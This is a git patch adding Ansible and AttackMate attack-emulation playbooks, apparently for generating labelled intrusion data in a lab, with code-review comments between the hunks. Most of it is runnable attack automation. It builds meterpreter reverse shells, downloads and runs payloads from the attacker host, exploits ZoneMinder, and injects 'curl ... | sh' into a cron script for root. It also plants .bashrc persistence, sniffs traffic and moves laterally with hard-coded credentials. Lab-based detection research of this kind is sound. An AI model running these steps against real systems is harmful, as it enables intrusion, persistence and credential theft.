From fdfa6deee579ec89e0f491b50504f840ba841f92 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 25 Nov 2025 15:07:51 +0100 Subject: [PATCH 1/2] update .gitignore --- ansible/.gitignore | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ansible/.gitignore b/ansible/.gitignore index 3cbfc7f9..8bfbe2c7 100644 --- a/ansible/.gitignore +++ b/ansible/.gitignore @@ -3,3 +3,5 @@ roles/* !roles/.gitkeep collections/* !collections/.gitkeep% +*tar.gz + From a9ee413057e85deaff637d9a8847950d3230992a Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 25 Nov 2025 15:09:37 +0100 Subject: [PATCH 2/2] move caldera files to deploy folder --- ansible/deploy/caldera/gather.yml | 52 +++++ ansible/deploy/caldera/main.yml | 123 ++++++++++++ .../caldera/templates/lateral_movement.j2 | 81 ++++++++ ansible/deploy/caldera/templates/playbook.j2 | 141 ++++++++++++++ ...aybook_interactive_shell_in_msf_session.j2 | 183 ++++++++++++++++++ .../templates/priviledge_escalation.j2 | 119 ++++++++++++ ansible/deploy/caldera/templates/tcpdump.j2 | 46 +++++ ansible/deploy/caldera/templates/upgrade.j2 | 49 +++++ 8 files changed, 794 insertions(+) create mode 100644 ansible/deploy/caldera/gather.yml create mode 100644 ansible/deploy/caldera/main.yml create mode 100644 ansible/deploy/caldera/templates/lateral_movement.j2 create mode 100644 ansible/deploy/caldera/templates/playbook.j2 create mode 100644 ansible/deploy/caldera/templates/playbook_interactive_shell_in_msf_session.j2 create mode 100644 ansible/deploy/caldera/templates/priviledge_escalation.j2 create mode 100644 ansible/deploy/caldera/templates/tcpdump.j2 create mode 100644 ansible/deploy/caldera/templates/upgrade.j2 diff --git a/ansible/deploy/caldera/gather.yml b/ansible/deploy/caldera/gather.yml new file mode 100644 index 00000000..413c845e --- /dev/null +++ b/ansible/deploy/caldera/gather.yml 
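Review bot: The added pattern `*tar.gz` also matches names such as `backuptar.gz`; the intended form is `*.tar.gz`. The context line `!collections/.gitkeep%` ends in a stray `%` (it looks like a shell-prompt artifact from a paste), and if that character is really in the file the negation does not un-ignore `collections/.gitkeep`, so it is worth correcting while this file is touched. The trailing blank line the hunk adds is harmless.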
@@ -0,0 +1,52 @@ +- hosts: attacker + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + # - /home/aecid/attackmate.log + # - /home/aecid/output.log + # - /home/aecid/attackmate.json + # - /home/aecid/Downloads/tcpdump_with_timeout_report.json + # - /home/aecid/Downloads/priviledge_escalation_report.json + - /home/aecid/Downloads/root_report.json + # - /home/aecid/Downloads/priv_esc_as_www_data_report.json + - /home/aecid/Downloads/become_www-data_sed_for_priv_esc_report.json + # - /home/aecid/Downloads/tcpdump_with_timeout_report.json + # - /home/aecid/Downloads/lateral_movement_scp_report.json + # - /home/aecid/Downloads/moved_scp_report.json + # - /home/aecid/Downloads/lateral_movement_ssh_two_commands_report.json + + + - src: /var/log + recursive: true + + kyoushi_gather_configs: + # - src: /home/aecid/lateral_movement.yml + - src: /var/www/html + recursive: true + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + + +- hosts: target, target2 + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_configs: + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + + kyoushi_gather_logs: + - src: /var/log + recursive: true + + + diff --git a/ansible/deploy/caldera/main.yml b/ansible/deploy/caldera/main.yml new file mode 100644 index 00000000..d9b3083b --- /dev/null +++ b/ansible/deploy/caldera/main.yml 
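Review bot: The `exclude` entries `"/etc/runit "` and `"/etc/sv "` carry a trailing space inside the quotes in both plays, so they will not match the directories they name; they should read `"/etc/runit"` and `"/etc/sv"`. Recursively gathering `/etc` from every host also copies `/etc/shadow` and the host keys under `/etc/ssh` into the collected dataset, so those paths belong in `exclude` as well unless the dataset is meant to contain them. `kyoushi_gather_ignore_errors: yes` should be the canonical boolean `true`, and `hosts: target, target2` with a space after the comma is presumably tolerated by Ansible's pattern parser, but the documented form is `target:target2`. The patch title says the files are moved, yet the diffstat shows eight creations and no deletions, so the previous copies are presumably still tracked elsewhere or were never committed.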
@@ -0,0 +1,123 @@ +- name: Retstart dnsmasq on inetdns + hosts: inetdns + become: true + tasks: + - name: stop dnsmasq + ansible.builtin.service: + name: dnsmasq + state: stopped + tags: + - playbooks + + - name: start dnsmasq + ansible.builtin.service: + name: dnsmasq + state: started + tags: + - playbooks + +- name: Prepare target + hosts: target + become: true + tasks: + - name: Ensure 127.0.0.1 is present in /etc/hosts + ansible.builtin.lineinfile: + path: "/etc/hosts" + line: "127.0.0.1\ttarget" + state: present + - name: audit d rules + ansible.builtin.lineinfile: + path: "/etc/audit/rules.d/audit.rules" + line: "-a always,exit -S all -F euid=0 -F perm=x -F key=HACKER_ACTION" + state: present + notify: Restart auditd service + handlers: + - name: Restart auditd service + ansible.builtin.service: + name: auditd + state: restarted + +- name: Prepare target2 + hosts: target2 + become: true + tasks: + - name: Ensure 127.0.0.1 is present in /etc/hosts + ansible.builtin.lineinfile: + path: "/etc/hosts" + line: "127.0.0.1\ttarget2" + state: present + - name: audit d rules + ansible.builtin.lineinfile: + path: "/etc/audit/rules.d/audit.rules" + line: "-a always,exit -S all -F euid=0 -F perm=x -F key=HACKER_ACTION" + state: present + notify: Restart auditd service + handlers: + - name: Restart auditd service + ansible.builtin.service: + name: auditd + state: restarted + +# - name: Install Attacker Host +# hosts: attacker +# become: true +# vars: +# attacker_user: aecid +# attacker_ip: 192.42.1.174 +# delay_before_attack: 300 +# tasks: +# - name: Ensure 127.0.0.1 is present in /etc/hosts +# ansible.builtin.lineinfile: +# path: "/etc/hosts" +# line: "127.0.0.1\tattacker" +# state: present +# - name: get user home directory +# ansible.builtin.shell: > +# getent passwd {{ attacker_user }} | awk -F: '{ print $6 }' +# changed_when: false +# register: user_home +# tags: +# - playbooks + + # - name: Create file for privilegde escalation + # ansible.builtin.shell: + # cmd: 
msfvenom -p cmd/unix/python/meterpreter/reverse_tcp LHOST=192.42.1.174 --platform x64 > /var/www/html/TODO.md + # creates: /var/www/html/TODO.md + + # - name: Ensure delay before commands + # ansible.builtin.replace: + # path: /etc/attackmate.yml + # regexp: 'command_delay: 0' + # replace: 'command_delay: 15' + # backup: yes + # become: true + # tags: + # - playbooks + + + # - name: Copy playbooks + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.template: + # src: "{{ item }}.j2" + # dest: "{{user_home.stdout}}/{{ item }}.yml" + # mode: '0755' + # loop: + # # - priviledge_escalation + # # - tcpdump + # - lateral_movement + # tags: + + # - playbooks + + # - name: "Run Caldera Playbook" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "sleep {{delay_before_attack}} && /usr/local/bin/attackmate-tmux lateral_movement.yml --json" + # chdir: "{{user_home.stdout}}" + # tags: + # - caldera + # - metasploit + # - attackmate + # - exploit diff --git a/ansible/deploy/caldera/templates/lateral_movement.j2 b/ansible/deploy/caldera/templates/lateral_movement.j2 new file mode 100644 index 00000000..38942cc0 --- /dev/null +++ b/ansible/deploy/caldera/templates/lateral_movement.j2 
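Review bot: The `Prepare target` and `Prepare target2` plays are identical apart from the hostname in the `/etc/hosts` line, so they can be one play with `hosts: target:target2` and `line: "127.0.0.1\t{{ inventory_hostname }}"`, which also keeps the audit rule and its handler in a single place. The first play's name has a typo (`Retstart dnsmasq`), and its stop/start task pair is what a single task with `state: restarted` does. Restarting auditd through `ansible.builtin.service` may be refused on systemd hosts whose unit sets `RefuseManualStop`; if that applies here, the handler would need to load the rules with `augenrules --load` or the `service auditd restart` command instead. The large commented-out `Install Attacker Host` play is dead code carrying a hard-coded attacker address; it should be removed or moved into a variables file rather than committed as a comment.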
@@ -0,0 +1,81 @@ +#################### +# +# Caldera lateral movement +# +#################### +vars: + $ATTACKER_ADDRESS: 192.42.1.174 + $TARGET_ADDRESS: 192.42.1.175 + $TARGET2_ADDRESS: 192.42.1.176 + + $LINUX_USER: aecid + $LINUX_USER_PASSWORD: aecid + + $TARGET2_USER: judy + $TARGET2_USER_PASSWORD: garland + +commands: + +#login with a valid account + - type: ssh + creates_session: foothold + username: $LINUX_USER + key_filename: "/home/aecid/.ssh/key" + hostname: $TARGET_ADDRESS + cmd: id + metadata: + techniques: "T1078.002" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts" + + - type: sleep + seconds: 30 + +# login with ssh username and password on second target + + - type: ssh + session: foothold + cmd: "ssh -o StrictHostKeyChecking=no -o PreferredAuthentications=password judy@192.42.1.176\n" + interactive: True + metadata: + techniques: "T1078.003" + tactics: "Lateral Movement" + technique_name: "Valid Accounts: Local Accounts" + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "garland\n" + interactive: True + metadata: + techniques: "T1078.003" + tactics: "Lateral Movement" + technique_name: "Valid Accounts: Local Accounts" + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "id\n" + interactive: True + metadata: + techniques: "T1087.001" + tactics: "Discovery" + technique_name: "Account Discovery: Local Account" + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "whoami\n" + interactive: True + metadata: + techniques: "T1087.001" + tactics: "Discovery" + technique_name: "Account Discovery: Local Account" + + diff --git a/ansible/deploy/caldera/templates/playbook.j2 b/ansible/deploy/caldera/templates/playbook.j2 new file mode 100644 index 00000000..a50e12ca --- /dev/null +++ b/ansible/deploy/caldera/templates/playbook.j2 
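Review bot: The `vars` block defines `$TARGET2_ADDRESS`, `$TARGET2_USER` and `$TARGET2_USER_PASSWORD`, but the two commands that need them hard-code `judy@192.42.1.176` and `garland` instead, so editing the vars has no effect; the `cmd` lines should read `"ssh -o StrictHostKeyChecking=no -o PreferredAuthentications=password $TARGET2_USER@$TARGET2_ADDRESS\n"` and `"$TARGET2_USER_PASSWORD\n"`, matching how `$ATTACKER_ADDRESS` is interpolated inside quoted commands in playbook.j2. `$ATTACKER_ADDRESS` and `$LINUX_USER_PASSWORD` are defined here but never referenced. Although the file is rendered as a Jinja template by Ansible, it contains no `{{ }}` expressions, so the lab credentials and addresses live as literals in the repository; passing them in as Ansible variables would keep a single source of truth with the inventory that main.yml targets.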
@@ -0,0 +1,141 @@ +#################### +# +# Caldera +# +#################### +vars: + $TARGET_ADDRESS: 192.42.1.175 + $ATTACKER_ADDRESS: 192.42.1.174 + $LINUX_USER: aecid + $LINUX_USER_PASSWORD: aecid + +commands: +#prepare the meterpreter payload/session + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: meterpreter + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + +#login with a valid account + - type: ssh + creates_session: foothold + username: $LINUX_USER + key_filename: "/home/aecid/.ssh/key" + hostname: $TARGET_ADDRESS + cmd: id + metadata: + techniques: "T1078.002" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts" + +#download the meterpreter payload and execute it + - type: ssh + session: foothold + cmd: "curl http://$ATTACKER_ADDRESS:8888/install.sh -o /home/$LINUX_USER/install.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "chmod +x /home/$LINUX_USER/install.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "./install.sh\n" + interactive: True + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "sudo tcpdump host 192.42.1.174 and port 8888 -A\n" + interactive: True + metadata: + techniques: "T1040" + tactics: "Credential Access" + technique_name: "Network Sniffing" + + - type: sleep + seconds: 10 + +#stop process by sending ctrl-c + - type: ssh + session: foothold + cmd: "03" + interactive: True + bin: True + +# Persistence + - type: ssh + cmd: "vim /home/$LINUX_USER/.bashrc\n" + session: foothold + interactive: True + + - type: ssh + cmd: 
":inoremap jj \n" + session: foothold + interactive: True + + - type: ssh + cmd: "/# for examples\n" + session: foothold + interactive: True + + - type: ssh + cmd: "o" + session: foothold + interactive: True + + - type: ssh + cmd: "./install.sh &" + session: foothold + interactive: True + metadata: + techniques: "T1547" + tactics: "Persistence, Privilege Escalation" + technique_name: "Boot or Logon Autostart Execution" + + - type: ssh + cmd: "jj" + session: foothold + interactive: True + + - type: ssh + cmd: ":wq!\n" + session: foothold + interactive: True + + - type: msf-session + session: meterpreter + cmd: sysinfo + +# upgrade the session + - type: msf-session + cmd: shell + session: foothold + + diff --git a/ansible/deploy/caldera/templates/playbook_interactive_shell_in_msf_session.j2 b/ansible/deploy/caldera/templates/playbook_interactive_shell_in_msf_session.j2 new file mode 100644 index 00000000..aaf8b450 --- /dev/null +++ b/ansible/deploy/caldera/templates/playbook_interactive_shell_in_msf_session.j2 
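Review bot: The final `msf-session` step names `session: foothold`, which is the ssh session created earlier, while the session that the `exploit/multi/handler` step creates is `meterpreter`; unless AttackMate resolves ssh session names for `msf-session`, that step should read `session: meterpreter`, as the same step does in playbook_interactive_shell_in_msf_session.j2. The tcpdump command hard-codes `host 192.42.1.174` although `$ATTACKER_ADDRESS` holds that value, and `$LINUX_USER_PASSWORD` is defined but never used; both points apply to playbook_interactive_shell_in_msf_session.j2 and tcpdump.j2 as well. `background: true` and `kill_on_exit: true` sit next to `interactive: True` and `bin: True`, so boolean spelling is mixed within one file. In `":inoremap jj \n"` only a plain space survives between `jj` and `\n`, so the mapping may have lost a non-printing character in transit; confirm the committed file holds what was intended.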
@@ -0,0 +1,183 @@ +#################### +# +# Priviledge Escalation +# +#################### +vars: + $TARGET_ADDRESS: 192.42.1.175 + $ATTACKER_ADDRESS: 192.42.1.174 + $LINUX_USER: aecid + $LINUX_USER_PASSWORD: aecid + +commands: +#prepare the meterpreter payload/session + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: meterpreter + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + +#login with a valid account + - type: ssh + creates_session: foothold + username: $LINUX_USER + key_filename: "/home/aecid/.ssh/key" + hostname: $TARGET_ADDRESS + cmd: id + metadata: + techniques: "T1078.002" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts" + +#download the meterpreter payload and execute it + - type: ssh + session: foothold + cmd: "curl http://$ATTACKER_ADDRESS:8888/install.sh -o /home/$LINUX_USER/install.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "chmod +x /home/$LINUX_USER/install.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "./install.sh\n" + interactive: True + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "sudo tcpdump host 192.42.1.174 and port 8888 -A\n" + interactive: True + metadata: + techniques: "T1040" + tactics: "Credential Access" + technique_name: "Network Sniffing" + + - type: sleep + seconds: 10 + +#stop process by sending ctrl-c + - type: ssh + session: foothold + cmd: "03" + interactive: True + bin: True + + - type: msf-session + session: meterpreter + cmd: sysinfo + +# upgrade the session + - type: msf-session + cmd: shell + 
session: "meterpreter" + + - type: msf-session + cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")"; + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: export SHELL=bash + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: export TERM=xterm256-color + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: stty rows 38 columns 116 + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + +## is this needed? + - type: msf-session + cmd: 'export PS1="PWN >"' + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + +# Persistence + - type: msf-session + cmd: vim /home/$LINUX_USER/.bashrc + session: "meterpreter" + + - type: msf-session + cmd: ":inoremap jj " + session: "meterpreter" + + - type: msf-session + cmd: "/# for examples" + session: "meterpreter" + + - type: msf-session + cmd: "o" + session: "meterpreter" + + - type: msf-session + cmd: "./install.sh &" + session: "meterpreter" + metadata: + techniques: "T1547" + tactics: "Persistence, Privilege Escalation" + technique_name: "Boot or Logon Autostart Execution" + + - type: msf-session + cmd: "jj" + session: "meterpreter" + + - type: msf-session + cmd: ":wq!\n" + session: "meterpreter" + + - type: msf-session + cmd: "exit" + session: "meterpreter" + + - type: ssh + session: foothold + cmd: "exit\n" + interactive: True + diff --git a/ansible/deploy/caldera/templates/priviledge_escalation.j2 b/ansible/deploy/caldera/templates/priviledge_escalation.j2 new file mode 100644 index 00000000..628c8553 --- /dev/null 
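Review bot: The header comment says `Priviledge Escalation` (misspelled, and apparently copied from priviledge_escalation.j2), although what distinguishes this playbook is the shell upgrade inside the meterpreter session; a header naming what the file does, e.g. `# Caldera: interactive shell via msf session`, would help whoever picks the right template later. The first block up to the ctrl-c step and the five shell-upgrade steps are duplicated verbatim from playbook.j2 and upgrade.j2; since upgrade.j2 already expects a `$UPGRADESESSION` variable, the upgrade block could presumably be included rather than copied, though I cannot see from the hunk how the templates are composed. The `## is this needed?` comment above the `PS1` step is an open question left in the committed file and should be resolved or reworded as a statement. `":wq!\n"` carries a trailing newline while the other `msf-session` commands in the file do not; confirm whether `msf-session` requires it.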
+++ b/ansible/deploy/caldera/templates/priviledge_escalation.j2 
@@ -0,0 +1,119 @@ +#################### +# +# Priviledge escalation (like Scenario 1 e a) +# +#################### +vars: + $SERVER_ADDRESS: video.attackbed.com + $ATTACKER_ADDRESS: 192.42.1.174 + $TARGET_ADDRESS: 192.42.1.175 + $DOMAIN: attackbed.com + $USER: aecid + +commands: + +#### use zoneminder exploit to gain foothold #### + + - type: msf-module + cmd: exploit/unix/webapp/zoneminder_snapshots + creates_session: "foothold" + options: + RHOSTS: $TARGET_ADDRESS + payload_options: + LHOST: 192.42.1.174 + payload: cmd/unix/python/meterpreter/reverse_tcp + metadata: + techniques: "T1190,T1059.006" + tactics: "Initial Access" + technique_name: "Exploit Public-Facing Application,Command and Scripting Interpreter: Python" + + - type: msf-session + cmd: shell + session: "foothold" + + - type: msf-session + cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")"; + session: "foothold" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: export SHELL=bash + session: "foothold" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: export TERM=xterm256-color + session: "foothold" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: stty rows 38 columns 116 + session: "foothold" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + +##### modify misconfigured cronjob to get reverse shell with root access #### + + - type: msf-session + cmd: vim /usr/share/awffull/awffull + session: "foothold" + + - type: msf-session + cmd: ":inoremap jj " + session: "foothold" + + - type: msf-session + cmd: "o" + session: "foothold" + + - type: msf-session + cmd: "curl http://$ATTACKER_ADDRESS/TODO.md | sh" + session: "foothold" + metadata: + techniques: "T1053" + tactics: 
"Execution,Persistence,Privilege Escalation" + + - type: msf-session + cmd: "jj" + session: "foothold" + + - type: msf-session + cmd: ":wq!\n" + session: "foothold" + metadata: + techniques: "T1053" + tactics: "Execution,Persistence,Privilege Escalation" + +##### msf-session as root #### + + - type: msf-module + cmd: exploit/multi/handler + creates_session: "root" + payload_options: + LHOST: 192.42.1.174 + payload: cmd/unix/python/meterpreter/reverse_tcp + + - type: msf-session + stdapi: True + cmd: "getuid" + session: "root" + + - type: msf-session + session: "root" + cmd: cat /etc/passwd + metadata: + techniques: "T1087.001" + tactics: "Discovery" + technique_name: "Account Discovery: Local Account" + diff --git a/ansible/deploy/caldera/templates/tcpdump.j2 b/ansible/deploy/caldera/templates/tcpdump.j2 new file mode 100644 index 00000000..bb7a6a6d --- /dev/null +++ b/ansible/deploy/caldera/templates/tcpdump.j2 @@ -0,0 +1,46 @@ +#################### +# +# Caldera tcpdump +# +#################### +vars: + $TARGET_ADDRESS: 192.42.1.175 + $ATTACKER_ADDRESS: 192.42.1.174 + $LINUX_USER: aecid + $LINUX_USER_PASSWORD: aecid + +commands: + +#login with a valid account + - type: ssh + creates_session: foothold + username: $LINUX_USER + key_filename: "/home/aecid/.ssh/key" + hostname: $TARGET_ADDRESS + cmd: id + metadata: + techniques: "T1078.002" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts" + +# execute and stop tcpdump + - type: ssh + session: foothold + cmd: "sudo tcpdump \n" + interactive: True + metadata: + techniques: "T1040" + tactics: "Credential Access" + technique_name: "Network Sniffing" + + - type: sleep + seconds: 10 + +#stop process by sending ctrl-c + - type: ssh + session: foothold + cmd: "03" + interactive: True + bin: True + + diff --git a/ansible/deploy/caldera/templates/upgrade.j2 b/ansible/deploy/caldera/templates/upgrade.j2 new file mode 100644 index 00000000..06e9b26d --- /dev/null 
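Review bot: Both `LHOST: 192.42.1.174` entries (in the zoneminder module step and the `exploit/multi/handler` step) hard-code the value that `$ATTACKER_ADDRESS` already holds, so they should read `LHOST: $ATTACKER_ADDRESS`; `$SERVER_ADDRESS`, `$DOMAIN` and `$USER` are defined but never referenced. The `metadata` on the `curl ... | sh` step and on the following `:wq!` step lacks the `technique_name` key that every other annotated step carries, which leaves the step annotations inconsistent. The filename and header spell `priviledge`; the same spelling appears in main.yml's commented loop and gather.yml's commented report paths, so a rename would have to touch those too.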
+++ b/ansible/deploy/caldera/templates/upgrade.j2 @@ -0,0 +1,49 @@ +commands: + - type: msf-session + cmd: shell + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + - type: msf-session + cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")"; + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + - type: msf-session + cmd: export SHELL=bash + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + - type: msf-session + cmd: export TERM=xterm256-color + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + - type: msf-session + cmd: stty rows 38 columns 116 + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + # needed for xclip and wmctrl + - type: msf-session + cmd: export DISPLAY=:0 + session: revshell + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" \ No newline at end of file
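Review bot: The last step uses `session: revshell` while every other step in the file uses `session: $UPGRADESESSION`, so the `DISPLAY` export would run in a different, and in this file undeclared, session; it should read `session: $UPGRADESESSION`. `$UPGRADESESSION` itself has no `vars:` entry here, so presumably the including playbook supplies it; a one-line comment at the top, `# expects $UPGRADESESSION to be set by the including playbook`, would make that contract explicit. The file also lacks a trailing newline.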